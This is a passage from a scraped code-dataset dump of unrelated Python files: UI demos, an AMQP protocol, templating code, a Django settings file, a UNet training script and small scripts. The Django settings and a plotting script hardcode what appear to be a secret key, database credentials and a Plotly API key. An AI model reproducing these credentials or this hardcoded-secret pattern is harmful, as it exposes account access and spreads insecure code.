(1.0/b)*np.cosh(a*x)\n\n# param initial values, plot values\na0, b0 = 1.0, 1.0\nx = np.arange(0, 5, 0.05)\n\n# plot setup\nax = plt.subplot(111)\nplt.subplots_adjust(left=0.15, bottom=0.25)\nl, = plt.plot(f(x, 1.0, 1.0))\n\n# *{{ slider setups\naxcolor = 'white'\nbmax = plt.axes([0.15, 0.15, 0.65, 0.03], axisbg=axcolor)\namax = plt.axes([0.15, 0.1, 0.65, 0.03], axisbg=axcolor)\n\nsb = Slider(bmax, r'$b$', 0.01, 1.0, valinit = b0, color = 'green')\nsa = Slider(amax, r'$a$', 0.1, 3.0, valinit = a0, color = 'red')\n\ndef update(val):\n l.set_ydata(f(x, sa.val, sb.val))\n\nsb.on_changed(update)\nsa.on_changed(update)\n# }}*\n\nplt.show()\n","sub_path":"1d_sliders.py","file_name":"1d_sliders.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"624883689","text":"# Copyright 2015 Cisco Systems, Inc.\n# All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\" twisted message queue protocol\nreference from https://github.com/pika/pika/blob/master/examples/twisted_service.py\n\"\"\"\n\nimport logging\n\nfrom pika import spec\nfrom pika.adapters import twisted_connection\nfrom twisted.internet.defer import inlineCallbacks\n\nPREFETCH_COUNT = 2\nLOG = logging.getLogger(__name__)\n\n\nclass PikaProtocol(twisted_connection.TwistedProtocolConnection):\n connected = False\n name = 'AMQP:Protocol'\n\n @inlineCallbacks\n def connected(self, connection):\n self.channel = yield connection.channel()\n yield self.channel.basic_qos(prefetch_count=PREFETCH_COUNT)\n self.connected = True\n for (exchange, routing_key, callback,) in self.factory.read_list:\n yield self.setup_read(exchange, routing_key, callback)\n\n self.send()\n\n @inlineCallbacks\n def read(self, exchange, routing_key, callback):\n \"\"\"Add an exchange to the list of exchanges to read from.\"\"\"\n if self.connected:\n yield self.setup_read(exchange, routing_key, callback)\n\n @inlineCallbacks\n def setup_read(self, exchange, routing_key, callback):\n \"\"\"This function does the work to read from an exchange.\"\"\"\n if not exchange == '':\n yield self.channel.exchange_declare(exchange=exchange, type='topic', durable=True, auto_delete=False)\n if not exchange == '':\n queue = yield self.channel.queue_declare(durable=False, exclusive=True, auto_delete=True)\n queue_name = queue.method.queue\n yield self.channel.queue_bind(queue=queue_name, exchange=exchange, routing_key=routing_key)\n else:\n queue = yield self.channel.queue_declare(queue=routing_key, durable=False, exclusive=True, auto_delete=True)\n queue_name = queue.fields[0]\n (queue, consumer_tag,) = yield self.channel.basic_consume(queue=queue_name, no_ack=True)\n d = queue.get()\n d.addCallback(self._read_item, queue, callback)\n d.addErrback(self._read_item_err)\n\n def _read_item(self, item, queue, callback):\n \"\"\"Callback function which is called when an item is read.\"\"\"\n d = queue.get()\n d.addCallback(self._read_item, queue, callback)\n d.addErrback(self._read_item_err)\n (channel, deliver, props, msg,) = item\n LOG.debug('%s (%s): %s', deliver.exchange, deliver.routing_key, repr(msg))\n callback(item)\n\n def _read_item_err(self, error):\n LOG.error(error)\n\n def send(self):\n \"\"\"If connected, send all waiting messages.\"\"\"\n if self.connected:\n while len(self.factory.queued_messages) > 0:\n (exchange, r_key, message,) = self.factory.queued_messages.pop(0)\n self.send_message(exchange, r_key, message)\n\n @inlineCallbacks\n def send_message(self, exchange, routing_key, msg):\n \"\"\"Send a single message.\"\"\"\n LOG.debug('%s (%s): %s', exchange, routing_key, repr(msg))\n yield self.channel.exchange_declare(exchange=exchange, type='topic', durable=True, auto_delete=False)\n prop = spec.BasicProperties(delivery_mode=2)\n try:\n yield self.channel.basic_publish(exchange=exchange, routing_key=routing_key, body=msg, properties=prop)\n except Exception as error:\n LOG.error('Error while sending message: %s', error)\n","sub_path":"yabgp/channel/protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"184325905","text":"class ApiMessageWrapper:\n error = None\n data = None\n currentStreet = None\n \n def __init__(self, error, currentStreet, data):\n self.error = error\n self.data = data\n self.currentStreet = currentStreet\n\n def getDic(self):\n return {\n \"error\": self.error,\n \"data\": self.data,\n \"currentStreet\": self.currentStreet\n }","sub_path":"brash/models/apiMessageWrapper.py","file_name":"apiMessageWrapper.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"288302275","text":"import logging\nfrom blinker import Namespace\nimport functools\n\n\nlogger = logging.getLogger(\"persistpy\")\nsignal_namespace = Namespace()\n\n\ndef log_operation(coll, op, data=None, pk=None):\n logger.debug(\"collection=%s operation=%s data=%s _id=%s\" % (coll, op, data, pk))\n\n\ndef create_change_tracking_type(name, wrapped_type, methods):\n def make_tracked_method(method_name):\n method = getattr(wrapped_type, method_name)\n def tracked_method(self, *args, **kwargs):\n rv = method(self, *args, **kwargs)\n self.callback(self, method_name)\n return rv\n return tracked_method\n\n attrs = dict((m, make_tracked_method(m)) for m in methods)\n def init(self, callback, *args, **kwargs):\n wrapped_type.__init__(self, *args, **kwargs)\n self.callback = callback\n attrs[\"__init__\"] = init\n\n return type(name, (wrapped_type,), attrs)\n\n\n# ChangeTrackingList = create_change_tracking_type(\"TrackingList\", list, (\"__delitem__\",\n# \"__delslice__\", \"__iadd__\", \"__imul__\", \"__setitem__\", \"__setslice__\",\n# \"append\", \"extend\", \"insert\", \"pop\", \"remove\", \"reverse\", \"sort\"))\n\n# ChangeTrackingDict = create_change_tracking_type(\"TrackingDict\", dict, (\"__delitem__\",\n# \"__setitem__\", \"clear\", \"pop\", \"popitem\", \"setdefault\", \"update\"))\n\n\nChangeTrackingList = create_change_tracking_type(\"TrackingList\", list, (\n \"append\", \"extend\", \"insert\", \"pop\", \"remove\", \"reverse\", \"sort\"))\n\nChangeTrackingDict = create_change_tracking_type(\"TrackingDict\", dict, (\n \"clear\", \"pop\", \"popitem\", \"setdefault\", \"update\"))","sub_path":"persistpy/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"601736761","text":"# Copyright The OpenTelemetry Authors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport datetime\nimport os.path\nimport re\nimport typing\n\nfrom jinja2 import Environment, FileSystemLoader, select_autoescape\n\nfrom opentelemetry.semconv.model.semantic_convention import SemanticConventionSet\nfrom opentelemetry.semconv.model.utils import ID_RE\n\n\ndef to_doc_brief(doc_string: typing.Optional[str]) -> str:\n if doc_string is None:\n return \"\"\n doc_string = doc_string.strip()\n if doc_string.endswith(\".\"):\n return doc_string[:-1]\n return doc_string\n\n\ndef merge(list: typing.List, elm):\n return list.extend(elm)\n\n\ndef to_const_name(name: str) -> str:\n return name.upper().replace(\".\", \"_\").replace(\"-\", \"_\")\n\n\ndef to_camelcase(name: str, first_upper=False) -> str:\n first, *rest = name.replace(\"_\", \".\").split(\".\")\n if first_upper:\n first = first.capitalize()\n return first + \"\".join(word.capitalize() for word in rest)\n\n\nclass CodeRenderer:\n pattern = \"{{{}}}\".format(ID_RE.pattern)\n matcher = re.compile(pattern)\n\n parameters: typing.Dict[str, str]\n\n @staticmethod\n def from_commandline_params(parameters=None):\n if parameters is None:\n parameters = []\n params = {}\n if parameters:\n for elm in parameters:\n pairs = elm.split(\",\")\n for pair in pairs:\n (k, v) = pair.split(\"=\")\n params[k] = v\n return CodeRenderer(params)\n\n def __init__(self, parameters: typing.Dict[str, str]):\n self.parameters = parameters\n\n def get_data_single_file(\n self, semconvset: SemanticConventionSet, template_path: str\n ) -> dict:\n \"\"\"Returns a dictionary that contains all SemanticConventions to fill the template.\"\"\"\n data = {\n \"template\": template_path,\n \"semconvs\": semconvset.models,\n \"attributes\": semconvset.attributes(),\n }\n data.update(self.parameters)\n return data\n\n def get_data_multiple_files(self, semconv, template_path) -> dict:\n \"\"\"Returns a dictionary with the data from a single SemanticConvention to fill the template.\"\"\"\n data = {\"template\": template_path, \"semconv\": semconv}\n data.update(self.parameters)\n return data\n\n @staticmethod\n def setup_environment(env: Environment):\n env.filters[\"to_doc_brief\"] = to_doc_brief\n env.filters[\"to_const_name\"] = to_const_name\n env.filters[\"merge\"] = merge\n env.filters[\"to_camelcase\"] = to_camelcase\n\n @staticmethod\n def prefix_output_file(file_name, pattern, semconv):\n base = os.path.basename(file_name)\n dir = os.path.dirname(file_name)\n value = getattr(semconv, pattern)\n return os.path.join(dir, to_camelcase(value, True), base)\n\n def render(\n self,\n semconvset: SemanticConventionSet,\n template_path: str,\n output_file,\n pattern: str,\n ):\n file_name = os.path.basename(template_path)\n folder = os.path.dirname(template_path)\n env = Environment(\n loader=FileSystemLoader(searchpath=folder),\n autoescape=select_autoescape([\"\"]),\n )\n self.setup_environment(env)\n if pattern:\n for semconv in semconvset.models.values():\n output_name = self.prefix_output_file(output_file, pattern, semconv)\n data = self.get_data_multiple_files(semconv, template_path)\n template = env.get_template(file_name, data)\n template.globals[\"now\"] = datetime.datetime.utcnow()\n template.globals[\"version\"] = os.environ.get(\"ARTIFACT_VERSION\", \"dev\")\n template.stream(data).dump(output_name)\n else:\n data = self.get_data_single_file(semconvset, template_path)\n template = env.get_template(file_name, data)\n template.globals[\"now\"] = datetime.datetime.utcnow()\n template.globals[\"version\"] = os.environ.get(\"ARTIFACT_VERSION\", \"dev\")\n template.stream(data).dump(output_file)\n","sub_path":"semantic-conventions/src/opentelemetry/semconv/templating/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":4641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"586236395","text":"# -*- coding: UTF-8 -*-\n\nimport os\nimport time\nimport random\n\nimport json\nimport re\nimport sqlite3\nimport threading\nimport time\nfrom threading import Semaphore, Thread\n\nimport pymysql\n\nimport dbSettings\nimport requests\n\nbatchSize = 100000\n\n\ndef dbMoveOrder(batchFrom,db,cursor):\n sql = \"SELECT * FROM `order` where id between {} and {}\".format(batchFrom,batchFrom+batchSize)\n cursor.execute(sql)\n db.commit()\n results = cursor.fetchall()\n sql = \"INSERT IGNORE INTO `order_` (`house_id`, `fetch_date`, `order_date`, repeat_flag)\\\n VALUES (%s,%s,%s,%s);\"\n\n vals = []\n for row in results :\n fetch_date = row[\"fetch_date\"]\n order_date = row[\"order_date\"]\n house_id = row[\"house_id\"]\n repeat_flag = \"{}:{}\".format(house_id, order_date)\n vals.append(\n (house_id, fetch_date, order_date, repeat_flag))\n \n # print(vals)\n cursor.executemany(sql, vals)\n db.commit()\n\n\nif __name__ == \"__main__\":\n db = dbSettings.db_connect()\n cursor = db.cursor()\n\n sql = \"SELECT * FROM `order` order by id desc limit 1\"\n cursor.execute(sql)\n db.commit()\n numTotal = cursor.fetchall()[0][\"id\"]\n print(numTotal)\n\n start = 0\n # numTotal = 20000\n\n for batchFrom in range(start,numTotal,batchSize):\n print(batchFrom,batchFrom+batchSize,100*batchFrom/numTotal)\n dbMoveOrder(batchFrom,db,cursor)\n","sub_path":"airbnbSpider_scrapy/airbnbSpider/airbnbSpider/historyCode/moveOrder.py","file_name":"moveOrder.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"106952459","text":"from PIL import Image\r\n# Используем функцию random для выбора картинки\r\nimport random\r\nnumber = random.random()\r\n# Функция отвечающая за вызов картинки\r\ndef show():\r\n if number > 0.5:\r\n img = Image.open('died.jpg')\r\n else:\r\n img = Image.open('safe.jpg')\r\n img.show()\r\nshow()\r\nprint(number)","sub_path":"died.py","file_name":"died.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"613158812","text":"# 2. 猜數字遊戲,猜心中想一個 0~7 之間的數字,然後回答問題\n# 用位元的方式 000 001\nans = 0\nprint(\"猜數字遊戲,猜心中想一個 0~7 之間的數字,然後回答問題\")\n\ntruefalse = \"輸入y或Y代表有,其他代表無:\"\n# 檢視2進位的第1位是否含1\nq1 = \"有沒有看到心中的數字:\\n\" + \\\n \"1,3,5,7 \\n\"\nnum = input(\"q1 + truefalse\")\nprint(num)\nif num == \"y\" or num == \"Y\":\n ans += 1\n# 檢視2進位的第2位是否含1\nq2 = \"有沒有看到心中的數字:\\n\" + \\\n \"2,3,6,7 \\n\"\nnum = input(\"q2 + truefalse\")\nprint(num)\nif num == \"y\" or num == \"Y\":\n ans += 2\n# 檢視2進位的第3位是否含1\nq3 = \"有沒有看到心中的數字:\\n\" + \\\n \"4,5,6,7 \\n\"\nnum = input(\"q3 + truefalse\")\nprint(num)\nif num == \"y\" or num == \"Y\":\n ans += 4\nprint(\"讀者心中所想的數字是:\",ans)","sub_path":"Ch3_Control_Flow/補充/guessnumber.py","file_name":"guessnumber.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"126716394","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals, absolute_import\n\nimport logging\n\nfrom unittest import TestCase\n\nfrom voluptuous import Invalid\n\nfrom udata.ext.harvest import filters\n\nlog = logging.getLogger(__name__)\n\n\nclass FiltersTest(TestCase):\n def test_boolean(self):\n true_values = ('1', 'on', 't', 'TRUE', 'true', 'y', 'yes', ' 1 ',\n ' tRuE ', True, 1, 2, -1)\n false_values = ('0', 'f', 'FALSE', 'false', 'n', 'no', 'off', ' 0 ',\n ' f ', False, 0)\n none_values = ('', ' ', None)\n\n for value in true_values:\n self.assertEqual(filters.boolean(value), True)\n\n for value in false_values:\n self.assertEqual(filters.boolean(value), False)\n\n for value in none_values:\n self.assertIsNone(filters.boolean(value))\n\n with self.assertRaises(Invalid):\n filters.boolean('vrai')\n\n def test_empty_none(self):\n empty_values = 0, '', [], {}\n non_empty_values = 'hello', ' hello '\n\n for value in empty_values:\n self.assertIsNone(filters.empty_none(value))\n\n for value in non_empty_values:\n self.assertEqual(filters.empty_none(value), value)\n\n def test_strip(self):\n self.assertEqual(filters.strip(' hello '), 'hello')\n self.assertIsNone(filters.strip(' '))\n\n def test_line_endings(self):\n self.assertEqual(filters.line_endings('hello\\r\\nworld!\\r '),\n 'hello\\nworld!\\n ')\n\n def test_hash(self):\n hashes = {\n 'md5': 'bd8668597bfba2d1843441d7199bea65',\n 'sha1': 'f2f0249827f501286b4713683e526d541d2cc7e2',\n 'sha256': ('c4373e1d81eb44882bf9ff539d0e5f'\n 'faf03a114abf9306591117d781966268f9')\n }\n\n for type, value in hashes.items():\n self.assertEqual(filters.hash(value),\n {'type': type, 'value': value})\n\n","sub_path":"udata_harvest/tests/test_filters.py","file_name":"test_filters.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"135834936","text":"# coding:utf-8\n\"\"\"\nDjango settings for cloud_web project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'l#*d(407-#-jhni$!(12(c*)rjy*6)&&m^*ty@16=kd9^tba!('\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n #私有云app部分\n 'compute',\n 'network',\n 'utility',\n #账户管理 author:weios\n 'account',\n # 云硬盘 author:weios\n 'storage',\n # 快照\n 'snapshot',\n # 安全组\n 'security',\n #秘钥\n 'keypair',\n #监控\n 'monitors',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n # 'cloud_web.middlerware.PageOprtationMiddleWare',\n 'cloud_web.middlerware.BlockedIpMiddleware',\n)\n\nROOT_URLCONF = 'cloud_web.urls'\n\nWSGI_APPLICATION = 'cloud_web.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'HOST': '172.16.60.254',\n 'NAME': 'cloud_db',\n 'USER': 'clouduser',\n 'PASSWORD': 'clouduser123',\n 'PORT': '3306'\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'zh_CN'\nTIME_ZONE = 'Asia/Shanghai'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = (\n os.path.join(BASE_DIR, \"static\").replace(\"\\\\\", \"/\"),\n # os.path.join(BASE_DIR, \"uploads\").replace('\\\\', '/'),\n)\n\n\n#日志文件配置\nimport logging\nlogging.basicConfig(\n level = logging.DEBUG,\n format='%(filename)s[line:%(lineno)d] %(levelname)s (%(asctime)s) %(message)s',\n datefmt='%H:%M:%S',\n)\n\n\n#私有云登录登出URL\n# LOGOUT_URL = \"/customer/logout/\"\n# LOGIN_URL = \"/customer/login/\"\n\n\n#模板目录\nTEMPLATE_DIRS = (\n os.path.join(BASE_DIR, \"templates\"),\n)\n\n\n#请求过期时间\nTIMEOUT = 3\n\n\n# api的配置文件:\n# *主要是ip和端口的配置\n# 标注 :#说明\n# IP的命名 :服务名称(大写) + API_IP\n# PORT的命名 :服务名称(大写) + API_PORT\n# *可配置(IP和端口号组合):\n# IP+PORT :服务名称(大写) + API_IP_PORT\n\n#镜像服务uri\nIMAGE_ENDPOINT = 'http://172.16.60.201:9292'\n\n# \"\"\"云主机服务_API\"\"\"\nCUMPUTE_API_IP = '172.16.60.254'\n# CUMPUTE_API_IP = '172.16.60.254'\nCUMPUTE_API_PORT = 8102\n\n# \"\"\"网络_API\"\"\"\nNETWORK_API_IP = \"172.16.60.254\"\n# NETWORK_API_IP = \"172.16.60.254\"\nNETWORK_API_PORT = 8104\n\n# \"\"\"云硬盘_API\"\"\"\n\nCLOUDDISK_API_IP = \"127.0.0.1\"\n# CLOUDDISK_API_IP = \"172.16.60.254\"\nCLOUDISK_API_PORT = 8319\n\n# \"\"\"认证_API\"\"\"\n# ACCOUNT_API_IP = \"127.0.0.1\"\nACCOUNT_API_IP = \"172.16.60.254\"\nACCOUNT_API_PORT = 8219\n\n# \"\"\"秘钥_API\"\"\"\nKEYPAIR_API_IP = \"127.0.0.1\"\n# KEYPAIR_API_IP = \"172.16.60.254\"\nKEYPAIR_API_PORT = 8419\n\n# \"\"\"监控_API\"\"\"\nMONITOR_API_IP = \"127.0.0.1\"\n# MONITOR_API_IP = \"172.16.60.254\"\nMONITOR_API_PORT = 8519\n\n# \"\"\"安全组_API\"\"\"\nSECURITY_API_IP = \"127.0.0.1\"\n# SECURITY_API_IP = \"172.16.60.254\"\nSECURITY_API_PORT = 8419\n\n# \"\"\"快照_API\"\"\"\nSNAPSHOT_API_IP = \"127.0.0.1\"\n# SNAPSHOT_API_IP = \"172.16.60.254\"\n\nSNAPSHOT_API_PORT = 8319\n\n# \"\"\"安全组_API\"\"\"\n# SECURITYP_API_IP = '192.168.30.220'\n# SECURITYP_API_IP = '192.168.30.220'\n# SECURITYP_API_PORT = 8105\n","sub_path":"cloud_web/cloud_web/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"408105281","text":"CONFIG_OPTIONS = {\n 'server': {\n 'interface': '0.0.0.0',\n 'publish_port': 5051,\n 'return_port': 5050,\n 'cache_dir': '/var/cache/caster',\n 'config_dir': '/etc/caster',\n },\n 'workers': {\n 'threads': 5,\n },\n 'crypto': {\n 'key_dir': '/etc/caster/keys',\n 'keysize': 2048,\n 'encrypt_algo': 'AES',\n 'hash_algo': 'SHA256',\n 'pki_algo': 'RSA',\n },\n 'logging': {\n 'log_dir': '/var/log/caster',\n 'file': 'server',\n 'log_level': 'DEBUG',\n 'out_level': 'ERROR',\n },\n}\n","sub_path":"caster/server/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"401405149","text":"from datetime import datetime\n\nfrom django.db import models\n\n# Create your models here.\nfrom models.URL.models import URL\n\n\nclass Visitor(models.Model):\n\n MOBILE = 1\n DESKTOP = 2\n\n DEVICES = (\n (MOBILE, 'Mobile'),\n (DESKTOP, 'Desktop'),\n )\n url = models.ForeignKey(URL, related_name='visitors', on_delete=models.CASCADE)\n device = models.IntegerField(choices=DEVICES, default=DESKTOP)\n browser = models.CharField(max_length=50)\n date = models.DateTimeField(default=datetime.now())\n ip = models.CharField(max_length=17, default='127.0.0.1')\n\n","sub_path":"models/visitor/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"39786284","text":"\n#%% Plotly\nimport plotly.plotly as py\npy.plotly.tools.set_credentials_file(username='notbatman', api_key='1hy2cho61mYO4ly5R9Za')\nimport plotly.graph_objs as go\n\n#%% Seaborn\n\nsns.set(style=\"white\", rc={\"axes.facecolor\": (0, 0, 0, 0)})\n\n\n\n\n#%% DAY NUMBER PLOT\nax=cat_counts_daynum.T.iloc[:,:10].plot(kind='line',subplots=False,figsize=PORTRAIT_A3,sharex=True,sharey=True,rot=90)\n\nax.legend(loc='upper center', bbox_to_anchor=(1, 1), ncol=1, fancybox=True, shadow=True)\n\nax.set_title(\"ASDF\")\ni+=1\n\n\n#%% DAY NUMBER PLOT ZOOM\nax=cat_counts_daynum.T.iloc[0:31,:10].plot(kind='line',subplots=False,figsize=PORTRAIT_A3,sharex=True,sharey=True,rot=90)\nax.legend(loc='upper center', bbox_to_anchor=(1, 1), ncol=1, fancybox=True, shadow=True)\nax.set_title(\"ASDF\")\ni+=1\n\n\n\n\n#%% Example \n# Create the data\nrs = np.random.RandomState(1979)\nx = rs.randn(500)\ng = np.tile(list(\"ABCDEFGHIJ\"), 50)\ndf = pd.DataFrame(dict(x=x, g=g))\nm = df.g.map(ord)\ndf[\"x\"] += m\n\n# Initialize the FacetGrid object\npal = sns.cubehelix_palette(10, rot=-.25, light=.7)\ng = sns.FacetGrid(df, row=\"g\", hue=\"g\", aspect=15, size=.5, palette=pal)\n\n# Draw the densities in a few steps\ng.map(sns.kdeplot, \"x\", clip_on=False, shade=True, alpha=1, lw=1.5, bw=.2)\ng.map(sns.kdeplot, \"x\", clip_on=False, color=\"w\", lw=2, bw=.2)\ng.map(plt.axhline, y=0, lw=2, clip_on=False)\n\n# Define and use a simple function to label the plot in axes coordinates\ndef label(x, color, label):\n ax = plt.gca()\n ax.text(0, .2, label, fontweight=\"bold\", color=color, \n ha=\"left\", va=\"center\", transform=ax.transAxes)\n\ng.map(label, \"x\")\n\n# Set the subplots to overlap\ng.fig.subplots_adjust(hspace=-.25)\n\n# Remove axes details that don't play will with overlap\ng.set_titles(\"\")\ng.set(yticks=[])\ng.despine(bottom=True, left=True)\n","sub_path":"03 scripts/00 Superceded/02 Plotting counts OLD.py","file_name":"02 Plotting counts OLD.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"268025905","text":"from django.urls import path\nfrom . import views\n\napp_name = 'core'\n\nurlpatterns = [\n path('',views.IndexView, name='index'),\n path('bbsr/', views.BbsrView, name='bbsr'),\n path('agra/', views.AgraView, name='agra'),\n path('bbsr/market/', views.BbsrMarket, name='bbsrmarket'),\n path('bbsr/food/', views.BbsrFood, name='bbsrfood'),\n path('bbsr/places/', views.BbsrPlaces, name='bbsrplaces'),\n path('bbsr/Weather/', views.BbsrWeather, name='bbsrweather'),\n path('bbsr/Crime/', views.BbsrCrime, name='bbsrcrime'),\n path('agra/market/', views.AgraMarket, name='agramarket'),\n path('agra/food/', views.AgraFood, name='agrafood'),\n path('agra/places/', views.AgraPlaces, name='agraplaces'),\n path('agra/Weather/', views.AgraWeather, name='agraweather'),\n path('agra/Crime/', views.AgraCrime, name='agracrime')\n]\n","sub_path":"analyzer/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"422928846","text":"import os\r\nfrom unet7 import unet\r\nfrom keras.models import Sequential\r\nfrom data_generator import DataGenerator\r\nfrom keras.callbacks import ModelCheckpoint\r\n\r\n\r\ndef fill_infos(train_dir, validation_dir):\r\n partition = { 'train': [], 'validation' : [] }\r\n labels = { }\r\n\r\n train_image_names = os.listdir(train_dir)\r\n train_image_names = [img_name for img_name in train_image_names if img_name.endswith('.jpg')] \r\n partition['train'].extend(train_image_names)\r\n\r\n validation_image_names = os.listdir(validation_dir)\r\n validation_image_names = [img_name for img_name in validation_image_names if img_name.endswith('.jpg')] \r\n partition['validation'].extend(validation_image_names)\r\n\r\n all_image_names = partition['train'].copy()\r\n all_image_names.extend(partition['validation'])\r\n for img_name in all_image_names:\r\n labels[img_name] = img_name[:-4] + '-colormask.png'\r\n\r\n return partition, labels\r\n\r\n\r\n\r\n\r\n\r\n# Parameters\r\nparams = {'dim': (512,512,3),\r\n 'batch_size': 4,\r\n 'shuffle': True}\r\n\r\ntraining_dir = 'UnetDataset_v2' #\r\nmodel_name = \"unet7\"\r\n\r\nfpath = \"check_points/\" + model_name + \"/\" + training_dir + \"/\" + model_name + \".hdf5\"\r\npartition, labels = fill_infos(training_dir + '/train', training_dir + '/validation')\r\ntraining_generator = DataGenerator(training_dir, 'train', partition['train'], labels, **params)\r\nvalidation_generator = DataGenerator(training_dir, 'validation', partition['validation'], labels, **params)\r\n\r\n#fpath = \"check_points/small_unet_v2/UnetDataset_v4/\" + training_dir + \"_small_UNet_v2_{epoch:02d}-{val_accuracy:.2f}_100.hdf5\"\r\n\r\n\r\ncheck_point = ModelCheckpoint(fpath, monitor='val_accuracy',\r\n verbose=2, save_best_only=True, mode='max')\r\nmodel = unet(input_size=params['dim']) \r\n\r\nmodel.fit_generator(generator=training_generator,\r\n validation_data=validation_generator,\r\n callbacks=[check_point],\r\n epochs=20, verbose=1,\r\n use_multiprocessing=True, workers=12)\r\n\r\n\r\nfrom numeric_test import jaccard_general\r\n\r\njaccard_general(model, training_dir + '/train', 0, 512, None)\r\njaccard_general(model, training_dir + '/test', 0, 512, None)\r\njaccard_general(model, training_dir + '/validation', 0, 512, None) \r\n\r\n","sub_path":"UNet/Model/UnetCombinations/7_2.py","file_name":"7_2.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"646005317","text":"import requests\nimport sys\n\nif len(sys.argv) > 1:\n port = sys.argv[1]\nelse:\n port = '8000'\n \nhost = 'http://greenlight.dyndns-home.com' \n\nAssetCode = None \n\n# Needs Ubuntu Firewall opened\n\nurl = '%s:%s/activateshcapi/covid19greenlight/dlypka/UseExistingWallets' % (host, port)\nr = requests.get(url)\nprint(str(r.status_code))\nprint('--End of call to activateshcapi()--\\n\\n')\n \nis_createshcsmartcontract_enabled = False\nif is_createshcsmartcontract_enabled:\n url = '%s:%s/createshcsmartcontract' % (host, port)\n r = requests.post(url, json={'smartcontract_name': 'covid19greenlight', 'CLIENT_CONTRACT_ADDRESS': '1QAinrbEfjv46jdpwZcqc1nB4tWH9AE8in'})\n print(str(r.status_code))\n print('--End of call to createshcsmartcontract()--\\n\\n')\n #input('Press any key to Terminate:')\n #exit(0) \n \n\nis_shareholder_post_enabled = False\nif is_shareholder_post_enabled: \n url = '%s:%s/shareholder' % (host, port)\n r = requests.post(url, 